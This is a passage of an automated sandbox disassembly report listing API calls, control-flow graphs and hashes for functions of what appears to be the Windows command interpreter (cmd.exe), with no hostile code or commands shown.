                                                                                      • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793754DE0
                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF793754DEE
                                                                                      • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793754E04
                                                                                        • Part of subcall function 00007FF793750580: _get_osfhandle.MSVCRT ref: 00007FF793750589
                                                                                        • Part of subcall function 00007FF793750580: SetConsoleMode.KERNELBASE ref: 00007FF79375059E
                                                                                        • Part of subcall function 00007FF793750580: _get_osfhandle.MSVCRT ref: 00007FF7937505AF
                                                                                        • Part of subcall function 00007FF793750580: GetConsoleMode.KERNELBASE ref: 00007FF7937505C5
                                                                                        • Part of subcall function 00007FF793750580: _get_osfhandle.MSVCRT ref: 00007FF7937505EF
                                                                                        • Part of subcall function 00007FF793750580: GetConsoleMode.KERNELBASE ref: 00007FF793750605
                                                                                        • Part of subcall function 00007FF793750580: _get_osfhandle.MSVCRT ref: 00007FF793750632
                                                                                        • Part of subcall function 00007FF793750580: SetConsoleMode.KERNELBASE ref: 00007FF793750647
                                                                                        • Part of subcall function 00007FF793754A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF7937549F1), ref: 00007FF793754A28
                                                                                        • Part of subcall function 00007FF793754A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7937549F1), ref: 00007FF793754A66
                                                                                        • Part of subcall function 00007FF793754A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7937549F1), ref: 00007FF793754A7D
                                                                                        • Part of subcall function 00007FF793754A14: memmove.MSVCRT(?,?,00000000,00007FF7937549F1), ref: 00007FF793754A9A
                                                                                        • Part of subcall function 00007FF793754A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7937549F1), ref: 00007FF793754AA2
                                                                                        • Part of subcall function 00007FF793754AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF793748798), ref: 00007FF793754AD6
                                                                                        • Part of subcall function 00007FF793754AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF793748798), ref: 00007FF793754AEF
                                                                                        • Part of subcall function 00007FF793755554: RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF793754E35), ref: 00007FF7937555DA
                                                                                        • Part of subcall function 00007FF793755554: RegQueryValueExW.KERNELBASE ref: 00007FF793755623
                                                                                        • Part of subcall function 00007FF793755554: RegQueryValueExW.KERNELBASE ref: 00007FF793755667
                                                                                        • Part of subcall function 00007FF793755554: RegQueryValueExW.KERNELBASE ref: 00007FF7937556BE
                                                                                        • Part of subcall function 00007FF793755554: RegQueryValueExW.KERNELBASE ref: 00007FF793755702
                                                                                      • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793754E35
                                                                                      • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793754E81
                                                                                      • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793754F69
                                                                                      • GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793754F95
                                                                                      • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793754FB0
                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793754FC1
                                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793754FD8
                                                                                      • GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793754FF8
                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793755037
                                                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF79375504B
                                                                                      • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7937550DF
                                                                                      • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7937550F2
                                                                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF79375510F
                                                                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793755130
                                                                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF79375514A
                                                                                      • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF793755175
                                                                                        • Part of subcall function 00007FF793753578: _get_osfhandle.MSVCRT ref: 00007FF793753584
                                                                                        • Part of subcall function 00007FF793753578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF79375359C
                                                                                        • Part of subcall function 00007FF793753578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7937535C3
                                                                                        • Part of subcall function 00007FF793753578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7937535D9
                                                                                        • Part of subcall function 00007FF793753578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7937535ED
                                                                                        • Part of subcall function 00007FF793753578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7937432E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF793753602
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Console$Mode_get_osfhandle$Heap$QueryValue$AddressAllocHandleProcProcess$CommandCriticalEnvironmentFreeInfoLineLockSectionSharedStrings$AcquireBufferCtrlDirectoryEnterFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenTitleTypeWindowsfreememmove
                                                                                      • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                                                                      • API String ID: 1049357271-3021193919
                                                                                      • Opcode ID: fa8d2def7bb0d79b836b7894b6796c7ff966ef088737a8baff12253f96499c8d
                                                                                      • Instruction ID: c112c52ef1ec8d21919dcb0b537597efa9e3325dcbee75d4cbb59cbde2239fc3
                                                                                      • Opcode Fuzzy Hash: fa8d2def7bb0d79b836b7894b6796c7ff966ef088737a8baff12253f96499c8d
                                                                                      • Instruction Fuzzy Hash: 33C17421A08A4296FAA4BB31A8D01B9F7A9FF4DB91F854135D90F277A1DF3CA5058370
                                                                                      Function 00007FF793753C24 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 289COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 732 7ff793753c24-7ff793753c61 733 7ff793753c67-7ff793753c99 call 7ff79374af14 call 7ff79374ca40 732->733 734 7ff79375ec5a-7ff79375ec5f 732->734 743 7ff79375ec97-7ff79375eca1 call 7ff79375855c 733->743 744 7ff793753c9f-7ff793753cb2 call 7ff79374b900 733->744 734->733 735 7ff79375ec65-7ff79375ec6a 734->735 737 7ff79375412e-7ff79375415b call 7ff793758f80 735->737 744->743 749 7ff793753cb8-7ff793753cbc 744->749 750 7ff793753cbf-7ff793753cc7 749->750 750->750 751 7ff793753cc9-7ff793753ccd 750->751 752 7ff793753cd2-7ff793753cd8 751->752 753 7ff793753cda-7ff793753cdf 752->753 754 7ff793753ce5-7ff793753d62 GetCurrentDirectoryW towupper iswalpha 752->754 753->754 755 7ff793753faa-7ff793753fb3 753->755 756 7ff793753fb8 754->756 757 7ff793753d68-7ff793753d6c 754->757 755->752 759 7ff793753fc6-7ff793753fec GetLastError call 7ff79375855c call 7ff79375a5d6 756->759 757->756 758 7ff793753d72-7ff793753dcd towupper GetFullPathNameW 757->758 758->759 760 7ff793753dd3-7ff793753ddd 758->760 763 7ff793753ff1-7ff793754007 call 7ff79375855c _local_unwind 759->763 762 7ff793753de3-7ff793753dfb 760->762 760->763 765 7ff7937540fe-7ff793754119 call 7ff79375855c _local_unwind 762->765 766 7ff793753e01-7ff793753e11 762->766 772 7ff79375400c-7ff793754022 GetLastError 763->772 778 7ff79375411a-7ff79375412c call 7ff79374ff70 call 7ff79375855c 765->778 766->765 770 7ff793753e17-7ff793753e28 766->770 774 7ff793753e2c-7ff793753e34 770->774 776 7ff793754028-7ff79375402b 772->776 777 7ff793753e95-7ff793753e9c 772->777 774->774 775 7ff793753e36-7ff793753e3f 774->775 779 7ff793753e42-7ff793753e55 775->779 776->777 780 7ff793754031-7ff793754047 call 7ff79375855c _local_unwind 776->780 781 7ff793753e9e-7ff793753ec2 call 7ff793752978 777->781 782 7ff793753ecf-7ff793753ed3 777->782 778->737 784 7ff793753e57-7ff793753e60 779->784 785 7ff793753e66-7ff793753e8f GetFileAttributesW 779->785 799 7ff79375404c-7ff793754062 call 7ff79375855c _local_unwind 780->799 793 7ff793753ec7-7ff793753ec9 781->793 788 7ff793753f08-7ff793753f0b 782->788 789 7ff793753ed5-7ff793753ef7 GetFileAttributesW 782->789 784->785 791 7ff793753f9d-7ff793753fa5 784->791 785->772 785->777 797 7ff793753f0d-7ff793753f11 788->797 798 7ff793753f1e-7ff793753f40 SetCurrentDirectoryW 788->798 794 7ff793753efd-7ff793753f02 789->794 795 7ff793754067-7ff793754098 GetLastError call 7ff79375855c _local_unwind 789->795 791->779 793->782 793->799 794->788 801 7ff79375409d-7ff7937540b3 call 7ff79375855c _local_unwind 794->801 795->801 803 7ff793753f13-7ff793753f1c 797->803 804 7ff793753f46-7ff793753f69 call 7ff79375498c 797->804 798->804 805 7ff7937540b8-7ff7937540de GetLastError call 7ff79375855c _local_unwind 798->805 799->795 801->805 803->798 803->804 815 7ff7937540e3-7ff7937540f9 call 7ff79375855c _local_unwind 804->815 816 7ff793753f6f-7ff793753f98 call 7ff79375417c 804->816 805->815 815->765 816->778
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
                                                                                      • String ID: :
                                                                                      • API String ID: 1809961153-336475711
                                                                                      • Opcode ID: db7a8accf24e76443df151eec26ec66c8909a5ebe3ef3b4491d16ca320e82ff4
                                                                                      • Instruction ID: a379a60f1049dde1cd64dc169d5e85af75d6a4255325b09d43e1e1edf2e1aead
                                                                                      • Opcode Fuzzy Hash: db7a8accf24e76443df151eec26ec66c8909a5ebe3ef3b4491d16ca320e82ff4
                                                                                      • Instruction Fuzzy Hash: 17D1402270DB8592EAB4EF25E4842BAF7A5FB88740F844136D94E537A4DF3CE545C720
                                                                                      Function 00007FF793752394 Relevance: 26.5, APIs: 7, Strings: 8, Instructions: 213COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 914 7ff793752394-7ff793752416 memset call 7ff79374ca40 917 7ff79375241c-7ff793752453 GetModuleFileNameW call 7ff79375081c 914->917 918 7ff79375e0d2-7ff79375e0da call 7ff793754c1c 914->918 923 7ff79375e0db-7ff79375e0ee call 7ff79375498c 917->923 924 7ff793752459-7ff793752468 call 7ff79375081c 917->924 918->923 930 7ff79375e0f4-7ff79375e107 call 7ff79375498c 923->930 929 7ff79375246e-7ff79375247d call 7ff79375081c 924->929 924->930 935 7ff793752483-7ff793752492 call 7ff79375081c 929->935 936 7ff793752516-7ff793752529 call 7ff79375498c 929->936 937 7ff79375e10d-7ff79375e123 930->937 935->937 947 7ff793752498-7ff7937524a7 call 7ff79375081c 935->947 936->935 940 7ff79375e125-7ff79375e139 wcschr 937->940 941 7ff79375e13f-7ff79375e17a _wcsupr 937->941 940->941 944 7ff79375e27c 940->944 945 7ff79375e17c-7ff79375e17f 941->945 946 7ff79375e181-7ff79375e199 wcsrchr 941->946 949 7ff79375e283-7ff79375e29b call 7ff79375498c 944->949 948 7ff79375e19c 945->948 946->948 956 7ff7937524ad-7ff7937524c5 call 7ff793753c24 947->956 957 7ff79375e2a1-7ff79375e2c3 _wcsicmp 947->957 951 7ff79375e1a0-7ff79375e1a7 948->951 949->957 951->951 954 7ff79375e1a9-7ff79375e1bb 951->954 958 7ff79375e264-7ff79375e277 call 7ff793751300 954->958 959 7ff79375e1c1-7ff79375e1e6 954->959 964 7ff7937524ca-7ff7937524db 956->964 958->944 962 7ff79375e1e8-7ff79375e1f1 959->962 963 7ff79375e21a 959->963 966 7ff79375e1f3-7ff79375e1f6 962->966 967 7ff79375e201-7ff79375e210 962->967 965 7ff79375e21d-7ff79375e21f 963->965 968 7ff7937524dd-7ff7937524e4 ??_V@YAXPEAX@Z 964->968 969 7ff7937524e9-7ff793752514 call 7ff793758f80 964->969 965->949 970 7ff79375e221-7ff79375e228 965->970 966->967 972 7ff79375e1f8-7ff79375e1ff 966->972 967->963 973 7ff79375e212-7ff79375e218 967->973 968->969 974 7ff79375e22a-7ff79375e231 970->974 975 7ff79375e254-7ff79375e262 970->975 972->966 972->967 973->965 977 7ff79375e234-7ff79375e237 974->977 975->944 977->975 978 7ff79375e239-7ff79375e242 977->978 978->975 979 7ff79375e244-7ff79375e252 978->979 979->975 979->977
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$EnvironmentFileModuleNameVariable_wcsuprwcschr
                                                                                      • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                                                                      • API String ID: 2622545777-4197029667
                                                                                      • Opcode ID: bd59c29d01747683900c9969ab54c99ddb5983c61e93a73bd4a825f93bf20993
                                                                                      • Instruction ID: 272626189376325584adc33a3d91f497d77b2207a10d3037007bcf846100987b
                                                                                      • Opcode Fuzzy Hash: bd59c29d01747683900c9969ab54c99ddb5983c61e93a73bd4a825f93bf20993
                                                                                      • Instruction Fuzzy Hash: 38915D61B09A8685EEB8AB30D8905F9A3A8FF4CB85FC44136C90E67795DF3CE504C360
                                                                                      Function 00007FF793750580 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 82COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: ConsoleMode_get_osfhandle
                                                                                      • String ID: CMD.EXE
                                                                                      • API String ID: 1606018815-3025314500
                                                                                      • Opcode ID: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                                                      • Instruction ID: 9249309a18d82c0b90a6bb40c08126453e5d43e8fc4e50ee32c00e719d7b95d6
                                                                                      • Opcode Fuzzy Hash: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                                                      • Instruction Fuzzy Hash: CF41D331A096428BF7A86B34E8D51B8B7A8FB8E752FC84179C50F533A0DF3CA5058661
                                                                                      Function 00007FF79374C620 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 312COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 992 7ff79374c620-7ff79374c66f GetConsoleTitleW 993 7ff79374c675-7ff79374c687 call 7ff79374af14 992->993 994 7ff79375c5f2 992->994 999 7ff79374c68e-7ff79374c69d call 7ff79374ca40 993->999 1000 7ff79374c689 993->1000 996 7ff79375c5fc-7ff79375c60c GetLastError 994->996 998 7ff79375c5e3 call 7ff793743278 996->998 1004 7ff79375c5e8-7ff79375c5ed call 7ff79375855c 998->1004 999->1004 1005 7ff79374c6a3-7ff79374c6ac 999->1005 1000->999 1004->994 1007 7ff79374c954-7ff79374c95e call 7ff79375291c 1005->1007 1008 7ff79374c6b2-7ff79374c6c5 call 7ff79374b9c0 1005->1008 1015 7ff79375c5de-7ff79375c5e0 1007->1015 1016 7ff79374c964-7ff79374c972 call 7ff7937489c0 1007->1016 1013 7ff79374c6cb-7ff79374c6ce 1008->1013 1014 7ff79374c9b5-7ff79374c9b8 call 7ff793755c6c 1008->1014 1013->1004 1018 7ff79374c6d4-7ff79374c6e9 1013->1018 1023 7ff79374c9bd-7ff79374c9c9 call 7ff79375855c 1014->1023 1015->998 1016->996 1024 7ff79374c978-7ff79374c99a towupper 1016->1024 1021 7ff79375c616-7ff79375c620 call 7ff79375855c 1018->1021 1022 7ff79374c6ef-7ff79374c6fa 1018->1022 1025 7ff79375c627 1021->1025 1022->1025 1026 7ff79374c700-7ff79374c713 1022->1026 1039 7ff79374c9d0-7ff79374c9d7 1023->1039 1029 7ff79374c9a0-7ff79374c9a9 1024->1029 1031 7ff79375c631 1025->1031 1030 7ff79374c719-7ff79374c72c 1026->1030 1026->1031 1029->1029 1034 7ff79374c9ab-7ff79374c9af 1029->1034 1035 7ff79375c63b 1030->1035 1036 7ff79374c732-7ff79374c747 call 7ff79374d3f0 1030->1036 1031->1035 1034->1014 1037 7ff79375c60e-7ff79375c611 call 7ff79376ec14 1034->1037 1044 7ff79375c645 1035->1044 1045 7ff79374c8ac-7ff79374c8af 1036->1045 1046 7ff79374c74d-7ff79374c750 1036->1046 1037->1021 1042 7ff79374c9dd-7ff79375c6da SetConsoleTitleW 1039->1042 1043 7ff79374c872-7ff79374c8aa call 7ff79375855c call 7ff793758f80 1039->1043 1042->1043 1050 7ff79375c64e-7ff79375c651 1044->1050 1045->1046 1049 7ff79374c8b5-7ff79374c8d3 wcsncmp 1045->1049 1051 7ff79374c76a-7ff79374c76d 1046->1051 1052 7ff79374c752-7ff79374c764 call 7ff79374bd38 1046->1052 1049->1051 1054 7ff79374c8d9 1049->1054 1055 7ff79374c80d-7ff79374c811 1050->1055 1056 7ff79375c657-7ff79375c65b 1050->1056 1059 7ff79374c773-7ff79374c77a 1051->1059 1060 7ff79374c840-7ff79374c84b call 7ff79374cb40 1051->1060 1052->1004 1052->1051 1054->1046 1063 7ff79374c817-7ff79374c81b 1055->1063 1064 7ff79374c9e2-7ff79374c9e7 1055->1064 1056->1055 1061 7ff79374c780-7ff79374c784 1059->1061 1075 7ff79374c84d-7ff79374c855 call 7ff79374cad4 1060->1075 1076 7ff79374c856-7ff79374c86c 1060->1076 1067 7ff79374c83d 1061->1067 1068 7ff79374c78a-7ff79374c7a4 wcschr 1061->1068 1070 7ff79374ca1b-7ff79374ca1f 1063->1070 1071 7ff79374c821 1063->1071 1064->1063 1072 7ff79374c9ed-7ff79374c9f7 call 7ff79375291c 1064->1072 1067->1060 1073 7ff79374c8de-7ff79374c8f7 1068->1073 1074 7ff79374c7aa-7ff79374c7ad 1068->1074 1070->1071 1077 7ff79374ca25-7ff79375c6b3 call 7ff793743278 1070->1077 1078 7ff79374c824-7ff79374c82d 1071->1078 1086 7ff79374c9fd-7ff79374ca00 1072->1086 1087 7ff79375c684-7ff79375c698 call 7ff793743278 1072->1087 1081 7ff79374c900-7ff79374c908 1073->1081 1082 7ff79374c7b0-7ff79374c7b8 1074->1082 1075->1076 1076->1039 1076->1043 1077->1004 1078->1078 1085 7ff79374c82f-7ff79374c837 1078->1085 1081->1081 1088 7ff79374c90a-7ff79374c915 1081->1088 1082->1082 1089 7ff79374c7ba-7ff79374c7c7 1082->1089 1085->1061 1085->1067 1086->1063 1093 7ff79374ca06-7ff79374ca10 call 7ff7937489c0 1086->1093 1087->1004 1094 7ff79374c917 1088->1094 1095 7ff79374c93a-7ff79374c944 1088->1095 1089->1050 1096 7ff79374c7cd-7ff79374c7db 1089->1096 1093->1063 1111 7ff79374ca16-7ff79375c67f GetLastError call 7ff793743278 1093->1111 1100 7ff79374c920-7ff79374c928 1094->1100 1103 7ff79374ca2a-7ff79374ca2f call 7ff793759158 1095->1103 1104 7ff79374c94a 1095->1104 1101 7ff79374c7e0-7ff79374c7e7 1096->1101 1106 7ff79374c92a-7ff79374c92f 1100->1106 1107 7ff79374c932-7ff79374c938 1100->1107 1108 7ff79374c7e9-7ff79374c7f1 1101->1108 1109 7ff79374c800-7ff79374c803 1101->1109 1103->1015 1104->1007 1106->1107 1107->1095 1107->1100 1108->1109 1112 7ff79374c7f3-7ff79374c7fe 1108->1112 1109->1044 1113 7ff79374c809 1109->1113 1111->1004 1112->1101 1112->1109 1113->1055
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: ConsoleTitlewcschr
                                                                                      • String ID: /$:
                                                                                      • API String ID: 2364928044-4222935259
                                                                                      • Opcode ID: 2d0f60311dbb7cb4575a21d0706b761dc6d692f27382b916cf53a40b82970273
                                                                                      • Instruction ID: 7a50722306868e47fb996f3c8b1dd0867a478090d794f9a3903296cce8a45828
                                                                                      • Opcode Fuzzy Hash: 2d0f60311dbb7cb4575a21d0706b761dc6d692f27382b916cf53a40b82970273
                                                                                      • Instruction Fuzzy Hash: 4AC19065A08643A2FAB4BB35D4C8379E2AAEF48B90FC44135D91E672D5DF3CE840D720
                                                                                      Function 00007FF793758D80 Relevance: 9.1, APIs: 6, Instructions: 95sleepCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1171 7ff793758d80-7ff793758da2 1172 7ff793758da4-7ff793758daf 1171->1172 1173 7ff793758dcc 1172->1173 1174 7ff793758db1-7ff793758db4 1172->1174 1177 7ff793758dd1-7ff793758dd9 1173->1177 1175 7ff793758db6-7ff793758dbd 1174->1175 1176 7ff793758dbf-7ff793758dca Sleep 1174->1176 1175->1177 1176->1172 1178 7ff793758ddb-7ff793758de5 _amsg_exit 1177->1178 1179 7ff793758de7-7ff793758def 1177->1179 1180 7ff793758e4c-7ff793758e54 1178->1180 1181 7ff793758e46 1179->1181 1182 7ff793758df1-7ff793758e0a 1179->1182 1183 7ff793758e73-7ff793758e75 1180->1183 1184 7ff793758e56-7ff793758e69 _initterm 1180->1184 1181->1180 1185 7ff793758e0e-7ff793758e11 1182->1185 1186 7ff793758e77-7ff793758e79 1183->1186 1187 7ff793758e80-7ff793758e88 1183->1187 1184->1183 1188 7ff793758e38-7ff793758e3a 1185->1188 1189 7ff793758e13-7ff793758e15 1185->1189 1186->1187 1191 7ff793758e8a-7ff793758e98 call 7ff7937594f0 1187->1191 1192 7ff793758eb4-7ff793758ec8 call 7ff7937537d8 1187->1192 1188->1180 1190 7ff793758e3c-7ff793758e41 1188->1190 1189->1190 1193 7ff793758e17-7ff793758e1b 1189->1193 1195 7ff793758f28-7ff793758f3d 1190->1195 1191->1192 1204 7ff793758e9a-7ff793758eaa 1191->1204 1199 7ff793758ecd-7ff793758eda 1192->1199 1197 7ff793758e2d-7ff793758e36 1193->1197 1198 7ff793758e1d-7ff793758e29 1193->1198 1197->1185 1198->1197 1202 7ff793758edc-7ff793758ede exit 1199->1202 1203 7ff793758ee4-7ff793758eeb 1199->1203 1202->1203 1205 7ff793758eed-7ff793758ef3 _cexit 1203->1205 1206 7ff793758ef9 1203->1206 1204->1192 1205->1206 1206->1195
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
